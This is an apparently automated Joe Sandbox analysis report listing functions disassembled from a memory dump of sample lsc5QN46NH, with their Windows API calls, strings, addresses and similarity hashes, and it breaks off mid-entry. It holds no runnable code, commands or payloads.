Opcode Fuzzy Hash: b9b1f3990157351d711ff1ff10736064fb47e391b9d3dae3160b3181450bff9e
Instruction Fuzzy Hash: 71319E71904619ABCF04EF54C8919EEB7B6FF04320B108A2DE82A977D2DB71A905CB90

Function 00658E90 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00607DE1: _memmove.LIBCMT ref: 00607E22

Part of subcall function 0065AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0065AABC

SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00658F14
SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00658F27
SendMessageW.USER32(?,00000189,?,00000000), ref: 00658F57

Part of subcall function 00607BCC: _memmove.LIBCMT ref: 00607C06

Strings

ComboBox, xrefs: 00658E9E
ListBox, xrefs: 00658ED3

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: MessageSend$_memmove$ClassName
String ID: ComboBox$ListBox
API String ID: 365058703-1403004172
Opcode ID: 5c4c7143dc9a88133438cda51e40e828fa8b85dbc8d616648973c96767d68aeb
Instruction ID: b138fae7fc0d59a573643f3caeedaab23849002ef1d470e7244df891e87b5e06
Opcode Fuzzy Hash: 5c4c7143dc9a88133438cda51e40e828fa8b85dbc8d616648973c96767d68aeb
Instruction Fuzzy Hash: D9210471A40108BEDB18ABB0DC45CFFB76BDF45360F10462DF825A72E1DF3918499A20

Function 0067182D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 86networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0067184C
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00671872
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 006718A2
InternetCloseHandle.WININET(00000000), ref: 006718E9

Part of subcall function 00672483: GetLastError.KERNEL32(?,?,00671817,00000000,00000000,00000001), ref: 00672498
Part of subcall function 00672483: SetEvent.KERNEL32(?,?,00671817,00000000,00000000,00000001), ref: 006724AD

Strings

, xrefs: 00671893

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
String ID:
API String ID: 3113390036-3916222277
Opcode ID: fea4726c5e7d47060e61f862521ab7d87bd768ec0d35c052e9fbd1029be8e5c0
Instruction ID: f2a49d08623970f8542cbdda1cbd9a27b80d3e10e56037118ceb2716738c91fd
Opcode Fuzzy Hash: fea4726c5e7d47060e61f862521ab7d87bd768ec0d35c052e9fbd1029be8e5c0
Instruction Fuzzy Hash: DD2180B1500208BFEB119F68DC85EBF77EEEB49744F10812BF549AA240EB249E0557A5

Function 006863E7 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00601D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00601D73
Part of subcall function 00601D35: GetStockObject.GDI32(00000011), ref: 00601D87
Part of subcall function 00601D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00601D91

SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00686461
LoadLibraryW.KERNEL32(?), ref: 00686468
SendMessageW.USER32(?,00000467,00000000,00000000), ref: 0068647D
DestroyWindow.USER32(?), ref: 00686485

Strings

SysAnimate32, xrefs: 0068643C

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
String ID: SysAnimate32
API String ID: 4146253029-1011021900
Opcode ID: d83cce101d5cb0fea24c3888f3ec39843cdcf6047dcf3ca81341867893dda806
Instruction ID: 39bce257493d812308af34c74a46aab7be9ea7279bd896ef67cae49c7a5bfad0
Opcode Fuzzy Hash: d83cce101d5cb0fea24c3888f3ec39843cdcf6047dcf3ca81341867893dda806
Instruction Fuzzy Hash: BB215B71250205BBEF106F64DC80EBF77EAEB59368F209729FA10962A0D7719C919760

Function 00666D9C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(0000000C), ref: 00666DBC
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00666DEF
GetStdHandle.KERNEL32(0000000C), ref: 00666E01
CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00666E3B

Strings

nul, xrefs: 00666E36

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: 372a22331112af1c19d50456234ae9903e6e42f61d9cab9cab25b5573d348a09
Instruction ID: 776722ce24b962ade4bf50eac87975f1509751c8acc74f6889ab5350e228a6de
Opcode Fuzzy Hash: 372a22331112af1c19d50456234ae9903e6e42f61d9cab9cab25b5573d348a09
Instruction Fuzzy Hash: D821A17460020AABDB209F69EC05A9A7BFAEF44720F204A29FDA1D73D0DB719951CB54

Function 00666E6A Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 00666E89
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00666EBB
GetStdHandle.KERNEL32(000000F6), ref: 00666ECC
CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00666F06

Strings

nul, xrefs: 00666F01

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: a3dc7b148d6f6c18a36ee8bf879a4198e6346d05ed0766e91de0bb1055892470
Instruction ID: 0f2a73f762e3ef1b70dfe56b48d61fd3ed57c596082d11dbe8037cb652fcdf5e
Opcode Fuzzy Hash: a3dc7b148d6f6c18a36ee8bf879a4198e6346d05ed0766e91de0bb1055892470
Instruction Fuzzy Hash: 1B21CF79604305ABDB209F69EC04AAA77AAEF44724F200B19FCA0D33D0DB71A951CB50

Function 0066AC40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 0066AC54
GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 0066ACA8
__swprintf.LIBCMT ref: 0066ACC1
SetErrorMode.KERNEL32(00000000,00000001,00000000,0068F910), ref: 0066ACFF

Strings

%lu, xrefs: 0066ACBB

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: ErrorMode$InformationVolume__swprintf
String ID: %lu
API String ID: 3164766367-685833217
Opcode ID: 23c398eafd31fd06f748d7b67ab030de27bc10c91ef281ca234083114d0451ae
Instruction ID: 991ed7ab38a7dced637c528b3e8182270607dc6e18fc0b2eeb744eae224c11f5
Opcode Fuzzy Hash: 23c398eafd31fd06f748d7b67ab030de27bc10c91ef281ca234083114d0451ae
Instruction Fuzzy Hash: 90217470640109AFCB50DF64C945DEF77BAEF49314B004069F905AB352DB31EA45CB61

Function 00661142 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 51sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,0065FCED,?,00660D40,?,00008000), ref: 0066115F
Sleep.KERNEL32(00000000,?,?,?,?,?,?,0065FCED,?,00660D40,?,00008000), ref: 00661184
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,0065FCED,?,00660D40,?,00008000), ref: 0066118E
Sleep.KERNEL32(?,?,?,?,?,?,?,0065FCED,?,00660D40,?,00008000), ref: 006611C1

Strings

@f, xrefs: 0066119D

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: CounterPerformanceQuerySleep
String ID: @f
API String ID: 2875609808-2661609202
Opcode ID: 134453a17be100a731394fff14c13a900c9cbdf8f25fcc0f5f06a5f3ce4ca618
Instruction ID: 41025284c61ffda594c96dec8742339138cac75dc5dd1bd409916d82d78e510c
Opcode Fuzzy Hash: 134453a17be100a731394fff14c13a900c9cbdf8f25fcc0f5f06a5f3ce4ca618
Instruction Fuzzy Hash: 72113C71D0052DE7CF009FA5D948AEEFB7AFF0B711F044566EA81BA240CB749590CBA5

Function 00661AE8 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 49COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00661B19

Strings

APPEND, xrefs: 00661B52
REMOVE, xrefs: 00661B1F
EXISTS, xrefs: 00661B41
KEYS, xrefs: 00661B30

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: BuffCharUpper
String ID: APPEND$EXISTS$KEYS$REMOVE
API String ID: 3964851224-769500911
Opcode ID: 1034d5c04256d4c02a8662d60b8cab6251a18b1fb7604c09da407fa265663d8a
Instruction ID: 67d57f06ee04e2eabc52a5cbd3a5cab9c554befa3e12bfa757f3619276e7e264
Opcode Fuzzy Hash: 1034d5c04256d4c02a8662d60b8cab6251a18b1fb7604c09da407fa265663d8a
Instruction Fuzzy Hash: 391184719002189FCF40EF54D8918FEB7B6FF26304B544469D815AB392EB325D06CF54

Function 0067EB55 Relevance: 7.7, APIs: 5, Instructions: 247COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0067EC07
GetProcessIoCounters.KERNEL32(00000000,?), ref: 0067EC37
GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 0067ED6A
CloseHandle.KERNEL32(?), ref: 0067EDEB

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: Process$CloseCountersHandleInfoMemoryOpen
String ID:
API String ID: 2364364464-0
Opcode ID: 81ccf6f1c25561570db525ece8a9981ae56409e4af3ddc6a98794e63b550935c
Instruction ID: 08bc90cc80f30bfdce8b3fd2d061f3a886872a223b0066a7f499f3c8e1435fd4
Opcode Fuzzy Hash: 81ccf6f1c25561570db525ece8a9981ae56409e4af3ddc6a98794e63b550935c
Instruction Fuzzy Hash: 0B819FB16407009FD764EF28C846B2BB7E6AF48710F04C91DF9999B3D2D671AC04CB55

Function 00680037 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00607DE1: _memmove.LIBCMT ref: 00607E22

Part of subcall function 00680E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0067FDAD,?,?), ref: 00680E31

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 006800FD
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0068013C
RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00680183
RegCloseKey.ADVAPI32(?,?), ref: 006801AF
RegCloseKey.ADVAPI32(00000000), ref: 006801BC

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
String ID:
API String ID: 3440857362-0
Opcode ID: 2d24d6795bfc95aa7c972685de5918d1769757896ad8a88fb429a1db99be1b92
Instruction ID: bcefeeb6a1de2d28080c6fe6a069bb5843f2f82c8803d84e5cdec488fa6a8321
Opcode Fuzzy Hash: 2d24d6795bfc95aa7c972685de5918d1769757896ad8a88fb429a1db99be1b92
Instruction Fuzzy Hash: FC517E71208204AFD744EF64CC95E6BB7EAFF84314F404A2DF596872A2DB31E909CB56

Function 0067D8C8 Relevance: 7.6, APIs: 5, Instructions: 139libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00609837: __itow.LIBCMT ref: 00609862
Part of subcall function 00609837: __swprintf.LIBCMT ref: 006098AC

LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0067D927
GetProcAddress.KERNEL32(00000000,?), ref: 0067D9AA
GetProcAddress.KERNEL32(00000000,00000000), ref: 0067D9C6
GetProcAddress.KERNEL32(00000000,?), ref: 0067DA07
FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0067DA21

Part of subcall function 00605A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00667896,?,?,00000000), ref: 00605A2C
Part of subcall function 00605A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00667896,?,?,00000000,?,?), ref: 00605A50

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
String ID:
API String ID: 327935632-0
Opcode ID: 1930bca97aca5c2aa24a66bc6e5a9f880b1695f21890189b63fb79656ffa34b6
Instruction ID: f1f3c77d68feb37e9ebcaf71afaa037f4526ac6cafa007c195d80df79beffb5c
Opcode Fuzzy Hash: 1930bca97aca5c2aa24a66bc6e5a9f880b1695f21890189b63fb79656ffa34b6
Instruction Fuzzy Hash: 2C512735A00209DFCB44EFA8C4849AEB7F6FF09320B14C569E95AAB352D731AD45CF94

Function 0066E571 Relevance: 7.6, APIs: 5, Instructions: 135COMMON

Download Yara Rule

APIs

GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 0066E61F
GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 0066E648
WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0066E687

Part of subcall function 00609837: __itow.LIBCMT ref: 00609862
Part of subcall function 00609837: __swprintf.LIBCMT ref: 006098AC

WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 0066E6AC
WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0066E6B4

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
String ID:
API String ID: 1389676194-0
Opcode ID: 568d90455719661ddff0c134f840f2eebbf6f88b32477ef7f4395af04e8282c6
Instruction ID: 269fa227eef96dc026c997838e71f33864e39c0c4f8c7d115811b0d24766d843
Opcode Fuzzy Hash: 568d90455719661ddff0c134f840f2eebbf6f88b32477ef7f4395af04e8282c6
Instruction Fuzzy Hash: 4B511E75A00105EFCB45EF64C9819AEBBF6EF09314F148499E849AB3A2CB31ED11DF64

Function 0068A056 Relevance: 7.6, APIs: 5, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d90a5faea9f1aa6baac778202adc1d51f05e1037a905cb9f1e46a599700c7063
Instruction ID: 224b3878db9c911852fd804657f42059ff108e713b039210a27ef74a4b29a63c
Opcode Fuzzy Hash: d90a5faea9f1aa6baac778202adc1d51f05e1037a905cb9f1e46a599700c7063
Instruction Fuzzy Hash: 81419235904114ABE710EFA8CC4CFE9BBA6EB09310F140366EC56A73E1C770AD51DB51

Function 00602344 Relevance: 7.6, APIs: 5, Instructions: 111keyboardCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00602357
ScreenToClient.USER32(006C57B0,?), ref: 00602374
GetAsyncKeyState.USER32(00000001), ref: 00602399
GetAsyncKeyState.USER32(00000002), ref: 006023A7

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: AsyncState$ClientCursorScreen
String ID:
API String ID: 4210589936-0
Opcode ID: cd7e7be9f38eb1e2c0e89f1b893f294313b4b369e4f5ddbf5af9a1a367f2cd40
Instruction ID: 4656414e8b8fe6d51398834cd93f81846d31ea848fab6a7f094c4848e921998e
Opcode Fuzzy Hash: cd7e7be9f38eb1e2c0e89f1b893f294313b4b369e4f5ddbf5af9a1a367f2cd40
Instruction Fuzzy Hash: 85416F3560411AFBCF1D9F68C848AEABB76FF05364F204319F929A22D0CB359990DF91

Function 006563AA Relevance: 7.6, APIs: 5, Instructions: 97windowCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 006563E7
TranslateAcceleratorW.USER32(?,?,?), ref: 00656433
TranslateMessage.USER32(?), ref: 0065645C
DispatchMessageW.USER32(?), ref: 00656466
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00656475

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: Message$PeekTranslate$AcceleratorDispatch
String ID:
API String ID: 2108273632-0
Opcode ID: 224e1a5c182e3f2a97c4d746c7d3f6d53e46d62a7ae2fdd9e2523db9cea35f58
Instruction ID: 2da80661ea61ba2a1429af2fd678ae1f7f1d97acfcd103add29af75fafb3a730
Opcode Fuzzy Hash: 224e1a5c182e3f2a97c4d746c7d3f6d53e46d62a7ae2fdd9e2523db9cea35f58
Instruction Fuzzy Hash: 8231A431900656AFDB648F70DC44FF67BEBAB01302F949269F822C32A1E765A4CDD761

Function 00658A1F Relevance: 7.6, APIs: 5, Instructions: 89sleepwindowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00658A30
PostMessageW.USER32(?,00000201,00000001), ref: 00658ADA
Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00658AE2
PostMessageW.USER32(?,00000202,00000000), ref: 00658AF0
Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00658AF8

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: MessagePostSleep$RectWindow
String ID:
API String ID: 3382505437-0
Opcode ID: a3c52167c76fa6b2c177f501c71ec3ac28ca3dfd7272f32db4e6e0094a4e1a73
Instruction ID: e124889cbf02e559d69af260118692c44e03a4de84145404d88d99f4d2a875fd
Opcode Fuzzy Hash: a3c52167c76fa6b2c177f501c71ec3ac28ca3dfd7272f32db4e6e0094a4e1a73
Instruction Fuzzy Hash: 8531AD71500219EFDB14CFA8D94DADE3BB6EB04316F10822AFD25E72D1DBB09958DB90

Function 0065B1EC Relevance: 7.6, APIs: 5, Instructions: 88windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 0065B204
SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0065B221
SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0065B259
CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 0065B27F
_wcsstr.LIBCMT ref: 0065B289

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
